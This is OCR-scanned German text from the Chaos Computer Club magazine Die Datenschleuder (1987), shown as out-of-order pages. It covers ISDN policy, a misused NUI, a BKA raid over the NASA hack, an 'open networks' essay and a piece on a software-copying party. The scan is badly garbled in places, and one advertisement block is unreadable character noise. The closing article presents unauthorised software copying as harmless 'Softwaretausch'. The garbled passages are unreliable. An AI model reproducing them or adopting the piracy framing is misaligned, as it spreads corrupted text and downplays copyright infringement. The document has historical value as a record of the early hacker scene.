scher Angriffe darstellt. Demgegenüber zeichnet 
sich eine weitergehende Computervemetzung da¬ 
durch aus, daß das Gesamtsystem immer redun¬ 
danter d.h. (zer)störungsunanfälliger wird. Ein aus¬ 
gefallenes Rechenzentrum kann innerhalb von Mil¬ 
lisekunden durch Rechenkapazität an anderer Stelle 
ersetzt werden - dank der Vernetzung. In diesem 
Sinne wird von den Netzarchiiekten durchaus schon 
in Begriffen von “Dezentralisierung“ und “Redun¬ 
danz“ gedacht - ganz im Gegensatz zur Strommafia. 
Vor zwanzig Jahren hätte die Bombe im Rechen¬ 
zentrum des Springer Verlags 2 - 3 Jahre Arbeit 
zunichte gemacht, wenn sie nicht nur eine Klo- 
schüssel, sondern Plattenspeicher zerstört hätte. Die 
Zeiten sind jedoch lange vorbei und beim letzten 
Druckerstreik haben sich - dank Rechnerverbund - 
kanadische Dmcker als Streikbrecher einsetzen las- 



Aspekte einer politischen Debatte zu ISDN 

Zur Zeit wird an der Zerschlagung der Bundespost 
als Kommunikationsmonopol gefingert. Siehe dazu 
die Dokumentation in der SZ Nr. 174 vom 1./2. 
August 1987 zu “Feststellungen und Empfehlungen 
der Regierungskommission“. Die Hauptinteressen 
dabei sind uE. winschaftlicher Natur unter dem 
Motto “Gewinne privatisieren, Verluste sozialisie¬ 
ren“. 


23 















Nach Einschätzung der Postgewerkschaft ist in Zu¬ 
kunft wahrscheinlich mit folgender Situation zu 
rechnen; 



- Die Post wird aufgeteilt in unabhängige Verwal¬ 
tungsbereiche für den gelben und grauen Bereich. 
Beim grauen Bereich verbleibt das Netzmonopol. 
Ein Minderheitenvotum, auch mindestens einen pri¬ 
vaten Netzträger zuzulassen, fiel mit immerhin 6:6 
Stimmen äußerst knapp aus. 


allen elektronischen Netzen besteht, die nach unse¬ 
rer Einschätzung die Mißbrauchsgefahr erheblich 
einschränkt bzw. diese Infrastruktur als Beherr¬ 
schungsinstrument wenig tauglich macht. 

KlausSchlelsIek, Reinhard Schrutzki, Jürgen Wieck¬ 
mann, Tom Todd, Thomas Esher, Udo Schacht 

Mitglieder Im Arbeitskreis Politischer Compute- 
relnsatz (APQC) 


- Nur die BP ist Berechtigt, den Telefondienst an¬ 
zubieten, jedoch endet ihr Monopol an der An¬ 
schlußdose. 

- Die 'Mehrwertdienste' Datex, Telex, Teletex, Te- 
mex (die ‘‘ex“-Dienste) und der Endgerätemarkt 
werden zu 50% der BP belassen, der Rest dem Markt. 
Weder für die BP, noch für die freien Anbieter gibt 
es irgendwelche Auflagen, und die freien Anbieter 
müssen sich die benötigte Leitungskapazität beim 
grauen Monopolisten mieten/kaufen. 

- Es wird Privaten gestattet, eigene Grundstücke 
selber für die interne Kommunikation auch Uber 
andere Gmndstücke hinweg zu verkabeln. 

Dies bedeutet keine änderung für die bürgcrrechis- 
relevanten Aspekte von ISDN gegenüber der jetzi¬ 
gen Situation. Auch in Zukunft soll ein Monopolist 
der Betreiber des geplanten ISDN Netzes sein. 

Nebenbei: Die Essenz des Machtanspruchs der DBF 
leitet sich daraus ab, daß es gesetzlich verboten ist, 
Kommunikation über Qrundsiücksgrcnzen hinaus 
von irgendjemand anderem als der Post machen zu 
lassen. (Sonderfall Bundeswehr). Die Bundesbahn 
hat nur deshalb ihr eigenes Tclcfonnetz, weil ihr 
“Grundstück“ sich über die gesamte Republik er¬ 
streckt. Ich halte es im Sinne von Dezentralisierung 
und Basisdemokratie für eine grüne Forderung, die 
Legalisierung der “Verkabelung“ im Rahmen der 
Nachbarschaftshilfe zu fordern. Unseres Erachtens 
ist nicht die Vernetzung an sich der Sündenfall, 
sondern die Monopolisierung der Netzträgerschaft. 

Auch nach der heraufdämmemden Neustrukturie¬ 
rung muß bei einem Mißbrauchsversuch nur eine 
Stelleusuipiertwerden.Daskontrastiertimmernoch 
erheblich mit der Situation in den USA, wo auf 
Grund des Fehlens eines Monopols jenseits der gel¬ 
ben Post eine wahrhaft chaotische Situation in fast 

24 


ks 251950 Aug 87 BEREICH APOC BAG QUER- 
FUNK.KRT 

CLIN CH/PÖLITIK/KS/2S.08.87/20:12/11558 2. 

GEMEIN 


Diese kleine unbedeutende Geschichte passierte 
vor zweieinhalb Jahren. Erst heute ward sie mir 
zugetragen und wir wollten den Daten nicht glau¬ 
ben, die uns unsere Ohren ins Hirn spielte. 

Da gab es in un.serer kleinen 'Galerie' eine kleine 
Vorstellung des Chaos Computer Clubs. Es war 
nette intime Atmosphäre bei Mandarinen und Ap¬ 
felmännchen. Nie waren mehr als 10 Leute gleich¬ 
zeitig anwesend, aber da keiner der Kiddy-Craclcs 
eine offizielle Leih-NUI hatte, war Not am Mann. 
Die Veranstaltung drohte langweilig zu werden. Und 
jeder neue Besucher wurde erst mal nach einer NUI 
gefragt. Und tatsächlich: Als schon keiner mehr dran 
glaubte, betrat ein netter junger Mann unsere Räume 
und nickte. Ja, er habe eine NUI und sei auch bereit, 
sie zur Verfügung zu stellen. Klasse. Und als er sie 
in die Tastatur tippte, schauten alle weg. Wir haben 
von ihm nie wieder etwas gehön. Den Grund dafür 
erfuhren wir erst jetzt; Die Rechnung, die die Post 
ihm pünktlich später aufmachie, belief sich auf etwa 
7000 DM. 

Haben wirklich alle weggeschaul? Egal ob Biele¬ 
felder oder Hamburger, Es ist einfach schweinisch, 
die NUI einer Privatperson als Leih-NUI zu ver¬ 
wenden! Und wir sind nun solidarisch sauer. Mit 
zweieinhalb Jahren Verspätung. Davon kann sich 
unser Bielefelder Besucher nichts kaufen. Weitere 
Worte will ich mir sparen. Weder was von Moral auf 
der einen noch ’Confldenza' auf der anderen Seite - 
auch nix von Vorsicht und Datenhygiene/hyste- 
rie/hyäne. Ein jeder beantrage seine NUI selbst bei 
der POST. 

CLINCH/DS-RED/PADELUUN/04.10.87/22;24/1617Z. 

Sitileiildjieuker 


PRAKTISCHE 
CHAOS-MARIE 

mit PETE CARROLL (GB) und FRATER V.'.D.'. (BRD) 

SEMINAR: 

"CHAOS-MAGIE UND FREISTILSCHAMANISMUS" 

Aach benährter Art »erden die Teilneliier in den fünf chaosiagiscben Grunddisziplinen 
Divination, Involtation, Evokation, Zauberei und Ilhsination ausgebildet, das Srlern- 
te »ird in der Praxis geprüft. Bs handelt sich also ui eine echte Einweihung in den 
Energiestroi der undogiatischen lodernen Chaos-Kagie. Für Anfänger wie für Fortge¬ 
schrittene geeignet. 

i 

Aus dei Prograii: Kagischer Paradigienwechsel in der Praxis * die Prinoipia Hagica, 
die Grundstrukturen der Kagie * schaianische Praktiken und loderne Technologie * cha- 
oistische FaBpfaagie * Quantenzauber • der Technofetisch ‘ Atavissus und Trauuarbeit 
* die Erschaffung von Psychogonen ‘ Chaos-Äagie und Gruppenarbeit ‘ praktische Ein¬ 
weihung ‘ Kraftübertragung und Fraftabzug ’ Chaos-Magie und Funenarbeit * das lagi- 
sche Pentathlon ‘ aagisches Schaltkreistraining * Arbeit »it dej Chaos-Scbiri ' 
Heilungs- und Sprengglyphen * die Nacht des Schreckens ' die Messe des Chaos u.a.a. 

I 

Seainarteriine: 05.-08. Juni 1987; Sealnarort: Nähe Bern/Schweiz 
S eainarqebühr : DM 560,- (Anzahlung; DM 260,-, Rest bei Seainarantrittl 
Strikte legrenzong der TeilnehaerAalil - daher baldige Anieldung eipfohlen! 

Bitte beachten: Pete Carroll und Frater V.-.D. , führen jedes Seiinar insgesait nur 
drei Mal durch, ub eriüdende Fliejbandroutine zu verleiden. Dieses ist die zweite 
Veranstaltung, also die vorletzte Chance für Sie, aa Seiinar 'Chaos-Magie und 
FreisCilschaBanisius' teilzunehBen. 

ß(JS: 

i:ii:rscttnJFr ri/A 

I “/ar 

amige 


Snlcnärfjfciibcr 








Dl« HAtkerbib«!, Ted tui 

041 oscutelirtiat Nia«aitirMtrt tdr H«ait und iftiat, 
ae tl w«TleB oraUca Teile «ca aod f(b tlider. OeliuaeBUaaa, 
HeiDUBtet. LcaeuhiU«, Ltitiptti. 

Am dem libitc du Bmic-Cedkfil * Ncum mo CCC ‘ Otr Cedi 
dm HaSpa* Coups * Cempater & leoiiilrer Saat * Satellit«»- 
hiaiAf * nsd * uad * usd .. 

2ia SaiitBOla A4 ISBN Mnm-W-t CMacrZwtU 

SmOl« lü des (tpUaitB Compiiiiciaiaa d«r ^aknaa TSO 

’Dit GnineD’ m Asftiaa des Dieiiaee Guadistades 

OwKiBlüfUi artCOBMWTwABie ttiUJiiw ncS eil a*«dria«« lA 

RecBlStlbtl lor «e» nantea Unaaa« um du Pelon t M 

uBdasdcriaABitpeiiDBtB leune lasonieaaea. 

Ce (UUf lii ADe, Aa b«i Wahneftauod itrtr deD«- 
UaasektB Btc&ii tat rcAoiee Um«b| e<t siAOttdiaa 


W« SiBseccBMikraseadUj und Valfcdrrätihnij 
tun kSnsda. 

Sa piaknsekai Raqebei fOiaile. die sieb fflfl der Volks- 
imd d»B laait «iibuBdetai BecaisftefeleDcct 


Inldpiknl 1 • Cnapulimm • 

Bau OaktsBiBUBaa vei S.W«r»irr. die das fktma 
CgBpiUtnveBaiuiiikrbek htliuekiei Das loiopalai 
kmttbl aus iiBcr H9-Dm Ikskani S1/4* ailfiBtn 
□ ■■•.VriS i»MB JM SB DekaAttijOBBStesK 

Aufbtcker'AcbniA«, AkbliKlahr' 

Oia A4 • Boies aiiM Baemra. uAieiaiuncA pestiei» 


M M) M 1-MArra mif mmtm P<« <A>Wb. au beMkUatifi n«ia4ati ai 

w arr AentUiaa Pm^SK»« aie*>mii»lu knekkiBttl *a(t Mkf. «(Bl Mita«! mc 

al luai ivrlaa. »u «rTtiMt eaaa ai* InwUtji« u«n> u* ■ e ali f« «»4 iw a» Ar 
BiUavruia« tti. AAan »«■ t<d «(Shn» teBt>a0UnR. otu luder* «»u m 




Oft.’CLe 


IMPRESSUM 


Oie Datenschleuder Numero 23 - Oktober 
1987 

Das wissenschaftliche Fachblatt für Daten¬ 
reisende 

D-2000 Hamburg 20 
Schwcnckestrasse 85 

Geonet: Geol;Chaos-Team 
CLINCH: Chaos-Team 
Btx : »Chaos# 

tel: 040-4903757 / 040-483752 


Herausgeber CCC e.V. 


ViSdP: Reinhard Schrutzki 


i Mitarbeiter (u.a.): 

IDDT, A. Eichler, P. Franck, H. Grusel, Henvart 
iHolland-Moritz, jwi, KS, M. Kuehn, Andy M.-M., 
jj. Nicolas, padeluun, Poetronic, S. Stahl, S. Wer- 
inery, TAM. 

I I 

INachdruck für nichtgewerbliche Zwecke bei Quel-j 
Jlenangabe erlaubt. | 

Jübeiraschter GesichtsausDrack im Selbstverlag. • 

|Iulil987 »•---■• / 


You should not... 


Hiermit möchte ich alle Datenschleuder-Leser drin¬ 
gend davor warnen, die Telefonnummer 00490811 
resp. 00490811 zu wählen. Nach dem Wählen der 
Nummer liegt bis zum Unterbrechen der Verbin¬ 
dung (sprich auflegen) ein ca. 0,8 Sekunden- 
Gebührentakt auf der Leitung, der zur Folge haben 
könnte, daß die Telefonrechnung rasant ansieigt. 
Und das muß doch wirklich nicht sein, oder? 


198709271400 TELWDS23.DOC Ls 16 
CUNCH/SYSOP/GAST/27.09.87/18;34/469Z. 


KURZ VOR SCHLUSS 


27.10.1987 - Neoe BKA-Aktlon 

Dlesoi«! wg. KASA 

Das BKA Ist zti dl«ser Stande mal wieder 
tMIg. Nachdem man noch mehr ala ela Jahr 
gebraoeht hatte, um In Sachen CERN/PHILIPS 
gegen die Falschen loszaschlagen and gegen 
vier CCC'MRglleder za ermitteln, geht es In 
der NASA-Sache o/fenhar schneller. Sieben 
Beamte des BKA ond der Hambnrger Kriminal¬ 
polizei durchsuchen derzeit die Privatwobnnng 
eines CCC* Mitgliedes wegen des Verdachts 
der Ausspähung von Daten (§202 a StGB). 

Der seinerzeit gelnBerte Verdacht, die BKA-- 
AktloD in den Räomen des CCC e.V. and 
zweier Vorstandsmitglieder habe nur dazu 
gedient, sich eine GrDoddatensaniiBlung zu 
verachaffen, um ln anderen Pillen besser 
ermitteln zn können, scheint sich za bestitl- 
gen. Unklar ist, wer Urheber dieser neuen 
BKA-Aktlon lat, denn der §202a StGB kann 
nor angewandt werden, wenn ein BetrofFener 
Anzeige erstattet. Die Staatsanwaltschft kann 
nicht von sich aas tätig werden. 

nie.k ils kurze direkte Information, eine offi¬ 
zielle Presseerklärung des CCC folgt In KUrze. 

Cl.;NCH/CHAO5/'SYSOP/27,l0.87/l8.O6/97f Z. 


Termin 


Am Wochenende 6.77. Dez. findet jeweils ab 10;00 
in den Räumen des FORBID eV (040-439 2336) eine 
Vorbereitungstagung füreine internationale Tagung 
im Oktober '8B zum Thema “3. Welt und neue 
Technologien“ statt. 


SntcnSdjlcubcr 











Postvertriebsstuck 

C9927F 

3ic ^oienSi^Iettbct “ ’ 

Das wissenschaftliche Fachblatt für Datenreisends 
Ein Organ des Chaos Computer Club 









Editorial 


In einer Billstedter 
Küche kommt NDR 2 
aus einem Topfdeckel 

Kopfschüttelnd steht Christian Wolany 
(42) in seiner blitzblanken Einbauküche. 
„Ich habe einen ganz normalen E-Herd - 
und aus dem kommt Musik" sagt er. Tat¬ 
sächlich. Obwohl nirgendwo in der Woh¬ 
nung ein ^diogerät eingeschaltet ist, er¬ 
tönt leise Musik. Sie schallt aus einem 

Topfdeckel, der auf dem Rand zwischen 
Herd und Edelstahlspüle liegt. 

„Ich hab’ in meinem Leben ja schon viel 
erlebt, nun glaube ich aber bald an Ge¬ 
spenster", sagt der Hausherr. 

Seit Mai 1987 leben Christian Wolan.v 
und seine Lebensgefährtin Brigitte Win¬ 
terlich (40) in der Dreizimmerwohnung 
am Rantumer Weg in Billstedt. Unerklär¬ 
liche Dinge waren ihnen noch nie aufge- 
failen. Doch nun scheint es im zweiten 
Stock des Neubaus zu spuken. 

Hobbykoch Wolany hatte seiner Freun¬ 
din versprochen, das Abendessen zu be¬ 
reiten. Bratwurst mit Brokkoli und Kar¬ 
toffeln standen aufdem Speisezettel. „Ich 
arbeitete wie immer am Herd und habe 
alles vorbereitet. Als ich dann die Kartof¬ 
feln abgießen wollte, dachte ich; Entwe¬ 
der bist du bekloppt, oder so was gibt es 
wirklich", sagt Christian Wolany. „Aus 
dem Deckel des KartofTeltopfes, den ich 
auf den Herd gelegt halle, ertönte klar das 
Programm von NDR 2." Auch seine 
Freundin und herbeigemfene Nachbarn 
wollten ihren Ohren nicht trauen. Deut¬ 
lich konnten sie die Sendung aus dem 
weißen EmaiUedeckel hören. Ein Scherz 
war es auch nicht, denn weder im Herd 
noch ln der Spüle odereinem der Schrän¬ 
ke war ein Radiogerät versteckt. Wie aber 
)ünn das funktionieren? 

Eine Antwort hat die Sendetechnik des 
NDR. Sie lautet: Unter bestimmten Be. 
dlngungen kann es Vorkommen, daß sich 
Ln mushalten ein sogenanntes Ersatz¬ 
schaltbild aufbaut Irgendein Metallge- 
genatand wird dabei zur Antenne, ein 
anderes MÖbelstüek aus Metall über* 
nimmt die Aufgaben eines Gleichrichters, 
ein drittes Teil schließlich schwingt wie 
die Membran eines Lautsprechers. 

Bel Christian Wolany spukt es also 
nicht Sein Herd oder die Spüle empfan¬ 
gen als Antenne das Mittelwellenpro- 
graznm des NDR vom nur etwa drei l^o- 
meter entfernten Sender Moorfleet Eines 
der beiden Küchenmöbel wandelt die 
HochA^uenzv/ellen um, der Topfdeckel 
spielt schließlich den Lautsprecher. 

Ein ausgesprochen seltener Vorgang, 
physikalisch aber zu erklären. HO 



So komm! Muslh (n den Topfdeckel: Oer Sender atrohlt dot 
Programm ob, Spüle und Herd wirken alt Antenne und 
Gtelchrlchter. der Decket alt Loutiprecher 2*(chnung mickacus 


Don’t unk - f unk _ 

Funkgeräte fUr CCCongress benötigt 

Zur Cewährlelstung der Sicherheitsma߬ 
nahmen auf dem Congress wäre es hilf¬ 
reich, wenn sich zur Verfügung stellende 
Sicherbeitskräfte (also Chaos-Dienstler) 
legale CB Funk-Geräte sowie ein kleines 
Sortiment an Quarzen mitbringen wurden. 
Konkret geht es darum, im Eidelstedter 
Bereich einen Überblick über eventuell 
vorhandene (Truppen-) Bewegungen von 
gewissen "Ordnungskräften" zu behalten. 
Im Rahmen unseres Frühwarnsystems wird 
dies leider nötig sein... 

Andy 

198712121942 CONGR-CB DOC L» 16 


<?v£AC.£; 

H4n»mtr6*- AittJiSCATT 


,y^SUOESH£-,A, 

1 Start der 
^Datenusrarbeifungi 
k am Poatschalterj 






Handwerbestempel zum Start der Schalterterminalsystema 


Salcnäifjlcubtr 


Offene Netze - Jetzt 

Eine Analyse über Denkstrukturen und Stra¬ 
tegien 


Daß der NASA-Coup nachhaltige Veränderun¬ 
gen in der Hacker-Szene bewirken wird, war 
schon klar, als die Geschichte noch nicht in der 
Öffentlichkeit war. Die Eimittlungsbehörden 
reagieren entsprechend der schon vor Monaten 
angestellten Planspiele. Behörden sind relativ 
leicht berechenbar. Allerdings halte man mehr 
Intelligenz und subtileres Vorgehen unterstellt. 
Stimmen die Informationen, die die in.stallierten 
Meßfühler signalisieren, scheint nicht nur das 
Wissen um technische Zusammenhänge unter 
dem angenommenen Knowhow zu liegen. Viel¬ 
mehr scheinen die Eckpfeiler der strategischen 
Planungen der Ermitllungsbehörden aus Zeiten 
zu stammen, die die gesellschaftlichen Verände¬ 
rungen durch die Computertechnik nicht be¬ 
rücksichtigt. 

Gleichzeitig reagieren auch Teile der Szene nach 
veralteten Strategien. Platt gesagt: Nach dem 68er- 
Mustcr wird eine kapitalistische Übermacht unter¬ 
stellt, für die der Staat Bütteldienste leistet, mit dem 
Ziel, die kleinen Leute an die Kandare zu nehmen 
und das Volk zu unterdrücken. Darüber kann jeder 
Staatsanwalt nur lachen und ohne Schwierigkeiten 
das Gegenteil beweisen. Ein oberflächlicher Blick 
auf die Tätigkeit des Kartellamtes reicht aus. Die 
Frage, was passiert wäre, wenn nicht beim CCC, 
sondern bei IBM durchsucht worden wäre, ist ent¬ 
sprechend einfach zu beantworten. Statt in Plastik¬ 
säcken hätte man das sichergestellte Zeug in LKW’s 
abu-ansportieren müssen. 


Alter Wein für alte Schläuche 


Analysiert man den Duktus mancher Kommentare, 
die sich kritisch mit der BKA-Aktion auseinander¬ 
setzen, wird ersichtlich, warum bisherige Revolu¬ 
tionen immer ihre eigenen Kinder gefressen haben. 
Es werden lediglich Machiverhältnisse umgekehrt, 
doch die Denkstrufctur veränderte sich nicht. Um das 
plastisch zu machen, hier einige Sätze aus einen 


Kommentar im (CLINCH-)Brett Rechiswesen: 
(“BKA rptiert..“) - allerdings mit vertauschten Rol¬ 
len. 



- 2. Absatz: “Das Vorgehen der Hacker halte ich 
inzwischen für unverschämte Übergriffe. Dies ist 
nicht nur ein persönliches Problem eines Roy Om- 
mond. Hier wird ein Präzedenzfall geschaffen. 
Wenn es uns nicht gelingt, dem CCC und den Hac¬ 
kern von Richtern erheblich auf die Finger klopfen 
zu lassen, dann werden die Aktivitäten der Szene 
künftig immer nach gleichem Verfahren ablaufen. “ 
(...) 

- 5. Absatz: “Ich glaube, daß dies inzwischen ein Fall 
für den Verfassungschutz i.st. Ich denke, daß über 
diese Schiene kompetente Experten zu finden sind, 
die Erfahrungen und Verbindungen haben, um den 
durchgeknallten Hackern die Rote Karte zu zeigen. 
Und ich denke, daß es jetzt Aufgabe des BKA ist, 
diese Gegenmaßnahmen zu koordinieren" (..) 

Ersetze nun.. 

“Hacker“ durch “Staatsanwaltschaft" 

“Roy Ommond" durch “Wau Holland, Steffen Wer- 
nery“ 



nuk (^frnatn ktku 

I am the ercator of darkness 


S)ntcnSd;lcubcr 


Seite 2 


Seite 3 







“CCC‘ durch “BKA" 

“BKA“ durch “CCC 

“Szene“ durch “Ermittlungsbehörden“ 

“VS“ durch “Humanistische Union“ (= Zusam¬ 
menschluß von Demokraten, die sich für die Bür¬ 
gerrechte cinsetzen, zum Schutz vor Übergriffen des 
Staates gegen diese Bürgerrechte.) 

..und schon sind die Kemaussagen des Orginals 
wieder hergestellt. 

Analysen, die von dieser Denkstruktur beeinflußt 
werden, führen zum Krieg - zum Krieg zwischen 
Etmitllungsbehörden und Hackern, wobei die Hac¬ 
ker auf technischer Ebene die besseren Karten haben. 


Aufrüstung zum Informationskrieg 

Im Informationskrieg mit dem BKA werden die 
Hacker mit Public-Key-Schlüsseln aufrüsten. In 
zwei, drei Jahren wird es kaum noch Festplatten ohne 
verschlüsselte Files geben. Gleiches gilt für die 
Mailboxkommunikation. Spätenstens an dieser S tei¬ 
le kann das BKA einpaoken, die Vorstellung ist 
gelaufen. 

Aber auch das, was bei einigen als Hackerethik in 
den Köpfen steckt; Offenheit und freier Zugang zu 
allen Informationen für alle. Davon später mehr. 

Für’s BKA stellen sich schon jetzt folgende Pro¬ 
bleme (*); 

- die Quantität der zu sichtenden Informationen und 
des Datenmülls bringen die Ermittlungen ins 
Schleudern. 

- Der Soft- und Hardwaremarkt mit ständig wech¬ 
selnden Systemen und Konfigurationen ist derart 
unübersichtlich, daß ihn niemand überblicken - ge¬ 
schweige denn, kontrollieren kann. Die paar 100 
Megabyte die zur Zeit durchgeflöht werden, sind nur 
ein kleiner Vorgeschmack dessen, was bei dieser 
BKA-Strategie zu leisten wäre. 

- Die Ermittlungsbehörde muß im nachhinein ge¬ 
gebene Programme und Strukturen analysieren, was 
bekanntlich weitausmehr Know-How erfordert, als 
diese Programme und Strukturen zu entwickeln. 
Platt gesagt, die Abteilung “Computerkriminalität“ 
im BKA müßte knowhow-mäßig um einige Pro¬ 
zentpunkte besser sein, als diejenigen die sie fangen 
will, was, bezogen auf die Hackerszene, ein aus¬ 
sichtsloses Ansinnen ist. 


- Das BKA wird sich bei einer Verfolgung der 
falschen Leute dermaßen blamieren, so daß die 
Chancen zur Eindämmung wirklich bedrohlicher 
Computerkriminalität um Jahre verspielt werden. 

(*) Diese Aussagen dürfen auch ohne Nennung der 
Quelle in geheimen Strategiepapieren des BKA ver¬ 
wendet werden) 

Die oben angedeutete Denkstruktur impliziert ver¬ 
altetes Freund-Feind-Denken, das am Ende in einem 
Psychokrieg endet, wobei auf DIESER Ebene die 
Ermittlungsbehörden mittelfristig die besseren Kar¬ 
ten haben. Doch was kommt dabei heraus? 



Planspiel Version BKA 2.4 


In der ersten Phase kann sich das Katz-und-Maus- 
Spiel zwischen BKA und Hackern zur Unterhal¬ 
tungsshow für die Nation entwickeln. Das BKA 
sammelt dabei Know-How und läßt sich dafür auch 
gerne ein wenig verarschen, denn jeder Fehler, jede 
Peinlichkeit enthält gleichzeitig unbezahlbares Wis¬ 
sen. Die Hackerszene hat ihren Spaß und der Anteil 
“staatlich geprüfter Hacker“ (Hausdurchsuchung) 
erhöht sich, so daß auch diese Auszeichnung an 
elitärem Wert verliert. Die Unterhaltungsshow ver¬ 
liert irgendwann ihren Reiz und es beginnt die zweite 
Phase. 

Da wage ich die Prognose, daß für einige Freaks das 
erste Techtelmechtel mit dem BKA zu seriösen Ar¬ 
beitsverträgen führt. Da werden sich dann andere 
fürchterlich drüber aufregen - aber niemand wird 

Sialengdjieuiec 


diese Entwicklung aufhalten können. Warum auch: 
an der prinzipiellen Situation wird sich nichts än¬ 
dern. Selbst wenn B.H.P. und CCC samt Umfeld mit 
dem geballten Know-How Unterabteilungen des 
BKA wären - die Aufklärungsquote würde sich nur 
unerheblich steigern. Die Informationstechnik - und 
der Scheiß, den man damit anstellen kann - läßt sich 
nicht kontrollieren. Das BKA kann sich also die 
psychologische Unterwanderang schenken - am En¬ 
de ist es mit viel Aufwand genau so schlau wie 
vorher. Sie werden wissen, daß sie nichts wissen 
können. Und das könnte man dann “institutionelle 
Weisheit“ nennen. 

Daß man beim BKA trotzdem Bewährtes auspro¬ 
bieren wird, ist klar. Jeder muß seine Fehler selber 
machen - auch eine Institution. Aber es wird sich in 
der Abteilung “Computerkrirainalität“ des BKA in 
den nächsten Jahren die Erkenntnis durchsetzen 
müssen, daß eine Spaltung der Szene in “kriminelle“ 
und “artige" Hacker fatale Folgen hat. Schafft man 
auf diesem Wege Computer-Terroristen, wird man 
die Geister die man rief nicht mehr los. Es wird 
aussichtslos sein, logische Bomben in irgendwel¬ 
chen Rechnern der Welt finden zu wollen. Diese 
Entwicklung kriminalistisch anzugehen, kommt 
dem Versuch gleich, den Ozean mit einem Fingerhut 
aus.schöpfen zu wollen. 



Sicherheit durch absolute Offenheit 


Es gibt zwei Möglichkeiten, mit den kommenden 
Problemen umzugehen: Eine intelligente und eine 
weniger intelligente. Die weniger intelligente wird 
gerade vom BKA praktizien. Die intelligente wäre, 
wenn das BKA mit den Hackern an einem Strang 
ziehen würde - und diese in der Forderung nach 
Offenen Netzen unterstützen würde. Es ist manch¬ 
mal vernünftig, auf die zu hören, die mehr Erfah¬ 
rungen im Umgang mit der Zukunft haben. 

Wenn die Zukunft Perspektive haben soll, muß man 
sich von bestimmten Denkstrukturen, vom Freund- 
Feind-Schema, verabschieden - auf beiden Seiten. 
Das wird für manche ein schmerzhafter Prozeß wer¬ 
den. Es bleibt, will man den Informationskrieg ver¬ 
meiden, nurdieForderungnach Offenen Netzen. Wo 
Information frei ist, braucht nichts versteckt zu wer¬ 
den, der Psychokrieg um die Verstecke entfällt, denn 
wir brauchen niemanden, der in vermeintlichen Ver¬ 
stecken schnüffeln muß. Sicherheit durch absolute 

Sfl(cn8d;fciiker 


Offenheit beinhaltet gleichzeitig die für jede De¬ 
mokratie notwendige Übersicht über die laufenden 
Entwicklungen. Freie Daten, lautet die Forderung 
für die Zukunft - und das ist gemeint, wenn Hacker 

die maschinenlesbare Regierung fordern. 

Der Effekt dieses Hacker-Grundsatzes trat bereits 
1967 am Massachuetts Institute of Technologie 
(MIT) zu Tage. Als ein Projektleiter am MIT die 
Einführung von individuellen Paßwörtern anord¬ 
nete, brachten die Hackerdas neue Programm immer 
wieder zum Absturz und schrieben ihrerseits ein 
Programm, bei dem der Benutzer lediglich den Be¬ 
fehl “kill System“ einzugeben brauchte - schon blieb 
der Rechner einfach stehen. Ein paar Neugierige 
probierten diesen Befehl aus, doch als sie erlebten, 
daß der Rechner tatsächlich abstürzte, machte nie¬ 
mand mehr von dieser Möglichkeit gebrauch. 

Der Nachhilfe-Unterricht für’s BKA sollte deshalb 
weniger auf technischer Ebene laufen, sondern als 
Seminar für Zukunftsfragen gestaltet werden. 


iwi 280145 0kl 87 BEREICH CLINCH OFFEN 



IMPRESSUM 

Die Datenschleuder Numero 24 - Dezember 
1987 

Das wissenschaftliche Fachblatt für Daten¬ 
reisende 

D-2000 Hamburg 20 
Schwenckestrasse 85 

Geonet: Geol:Chaos-Team 
CLINCH : Chaos-Team 
Btx : *ChaosJf 

tel: 040-4903757 / 040-483752 
Herausgeber und ViSdP: Reinhard Schrutzki 
Mitarbeiter (u.a.): 

DDT, A. Eichler, P. Franck, H. Grusel, Herwart 
Holland-Moritz, jwi, KS, M. Kuehn, Andy M.-M., 
J. Nicolas, padeluun, Poetronic, S. Stahl, S. Wer- 
nery.TAM, JACUi£ , ChaiS^ 

Nachdruck für nichtgewerbliche Zwecke bei Quel¬ 
lenangabe erlaubt. 

Unter EreignisDruck im Selbstverlag. 


Seite ^ 


Seite 5 





Bit-Napping 


padeluun und Rena Tangens von der Galerie Art 
d’Ameublement in Bielefeld sind dem Compu- 
ferfreund bereits durch ihre PUBLIC DOMAIN- 
Veranstallungen im Bunker Ulmen wall bekannt. 
Anläßlich der von ihnen im vergangenen Monat 
durchgeführten BIT-N APPING-PARTY-Vl.O 
sah die Kripo - scharf gemacht von einer großen 
Softwarefirma • sich veranlaßt, eine Haus¬ 
durchsuchung vorzunehmen. 

“Raubkopieren“. Welch unschönes Wort. Niemand 
raubt. Eigentlich heißt es “Softwaretauseh". Der 
Artikel von Cäsar/Stöpsel in der letzten DATEN¬ 
SCHLEUDER und die Hausdurchsuchung in Bie¬ 
lefeld erfordern eine Stellungnahme. 

Schon immer bestaunte ich die Diskettenkästen bei 
den Kids. Hunderte von Disketten, jede drei Mark 
teuer - mal mehr - mal weniger. “Hast Du...“, meine 
naive Frage. “Kann sein, falls ich's nicht gelöscht 
habe.“ Fast immer die gleiche Antwon. Und bei 
“Zeig mal was“ der Griff in die Kiste. Diskette 
einlegen und - ja, und dann kommt ein INTRO. Die 
Cracker haben in 'zweistündiger Arbeit’ mal eben 
das Unmögliche möglich gemacht. Da stellt der 
ATARI plötzlich 46000 (?) Farben gleichzeitig auf 
dem Schirm dar, der AMIGA bringt ein fünfminU- 
tiges gesampeltes Musikstück 'rüber' und der gute 
alte C64 wird bis über den Bildschirmrand hinaus 
mit formatfüllenden höchstauflösenden Farbgrafi¬ 
ken aufgepeppt. 

Ich weiß, daß das alles technisch unmöglich ist und 
vor meinen Augen passiert es. Und. Was hat das mit 
’Raubkopien’ zu tun? Die kommen dann hinter dem 
INTRO. Und bevor die KINGS OFT- oder ARIOLA- 

£in(cn?d)Icuber 


Programme auch nur die geringste Chance haben, 
gesehen zu werden, sind sie auch schon ausge- 
schaliet und das nächste INTRO wird eingelegt. Hier 
und da schaut man sich auch mal ein Programm an. 
BECKER-TEXT gefällt WORDPLUS-Benutzem 
recht gut. Da ich schon lange keine Computerzei¬ 
tungen mehr kaufe, hätte ich von derExistenzdieses 
Programmes nie erfahren. Wenn nicht, ja, wenn 
nicht in Bielefeld die BIT-NAPPING-PARTY-Vl .0 
stattgefunden hätte. 


Festnahme und 'Frühstück danach’ 


Schon der Titel der Veranstaltung sagt alles. Schlaf¬ 
säcke und Rechner sollten milgebracht werden, ge¬ 
rüchteweise verbreitete sich die Nachricht bis hinein 
in die größeren Softwarehäuser; daß da fäl¬ 
schungssichere und durchnumerierte Einladungs¬ 
karten unterwegs waren. Die Bit-Napping-Party für 
sich war ein voller Erfolg. Wir lachten selber Uber 
unsere Sicherheitsvorkehrungen, ln Bielefeld mußte 
